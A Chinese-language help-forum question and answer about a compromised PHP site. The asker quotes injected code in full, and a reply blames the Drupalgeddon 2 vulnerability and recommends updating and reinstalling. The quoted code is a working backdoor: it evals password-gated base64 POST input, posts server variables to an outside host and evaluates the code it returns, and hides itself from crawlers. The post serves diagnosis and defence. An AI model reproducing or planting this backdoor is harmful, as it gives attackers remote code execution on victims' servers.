有人向我的 php 文件中注入了以下代码:
if(md5($_POST["pf"]) === "93ad003d7fc57aae938ba483a65ddf6d") {
eval(base64_decode($_POST["cookies_p"])); }
if (strpos($_SERVER['REQUEST_URI'], "post_render" ) !== false) { $patchedfv = "GHKASMVG"; }
if( isset( $_REQUEST['fdgdfgvv'] ) ) { if(md5($_REQUEST['fdgdfgvv']) === "93ad003d7fc57aae938ba483a65ddf6d") { $patchedfv = "SDFDFSDF"; } }
if($patchedfv === "GHKASMVG" ) { @ob_end_clean(); die; }
if (strpos($_SERVER["HTTP_USER_AGENT"], "Win" ) === false) { $kjdke_c = 1; }
error_reporting(0);
if(!$kjdke_c) { global $kjdke_c; $kjdke_c = 1;
global $include_test; $include_test = 1;
$bkljg=$_SERVER["HTTP_USER_AGENT"];
$ghfju = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler", "bot", "spid", "Lynx", "PHP", "WordPress". "integromedb","SISTRIX","Aggregator", "findlinks", "Xenu", "BacklinkCrawler", "Scheduler", "mod_pagespeed", "Index", "ahoo", "Tapatalk", "PubSub", "RSS", "WordPress");
if( !($_GET['df'] === "2") and !($_POST['dl'] === "2" ) and ((preg_match("/" . implode("|", $ghfju) . "/i", $bkljg)) or (@$_COOKIE['condtions']) or (!$bkljg) or ($_SERVER['HTTP_REFERER'] === "http://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']) or ($_SERVER['REMOTE_ADDR'] === "127.0.0.1") or ($_SERVER['REMOTE_ADDR'] === $_SERVER['SERVER_ADDR']) or ($_GET['df'] === "1") or ($_POST['dl'] === "1" )))
{}
else
{
foreach($_SERVER as $ndbv => $cbcd) { $data_nfdh.= "&REM_".$ndbv."='".base64_encode($cbcd)."'";}
$context_jhkb = stream_context_create(
array('http'=>array(
'timeout' => '15',
'header' => "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:10.0.9) Gecko/20100101 Firefox/10.0.9_ Iceweasel/10.0.9\r\nConnection: Close\r\n\r\n",
'method' => 'POST',
'content' => "REM_REM='1'".$data_nfdh
)));
$vkfu=file_get_contents("http://nortservis.net/session.php?id", false ,$context_jhkb);
if($vkfu) { @eval($vkfu); } else {ob_start(); if(!@headers_sent()) { @setcookie("condtions","2",time()+172800); } else { echo "<script>document.cookie='condtions=2; path=/; expires=".date('D, d-M-Y H:i:s',time()+172800)." GMT;';</script>"; } ;};
}
}
我在 /etc/hosts 中屏蔽了 nortservis.net。我禁用了 allow-php-url-fopen。我在服务器上安装了 fail2ban,但它没有捕获到这个问题。我该怎么办?
答案1
几周前我遇到了和你一样的问题:我的服务器中的 php 文件被注入了一模一样代码。
就我而言,我发现我的 Drupal 网站没有更新,并被名为 Druppalgeddon 2(又名 SA-CORE-2018-002)的漏洞利用,该漏洞被用来篡改我的系统并注入此 php。鉴于漏洞的严重性,我清除了我的服务器并重新安装了所有内容(教训:保持系统更新!)。
如果您使用 Drupal,请验证您的版本是否为最新版本,并且不受 SA-CORE-2018-002 的攻击。漏洞利用可能会在您的访问日志中显示为可疑的 POST 记录。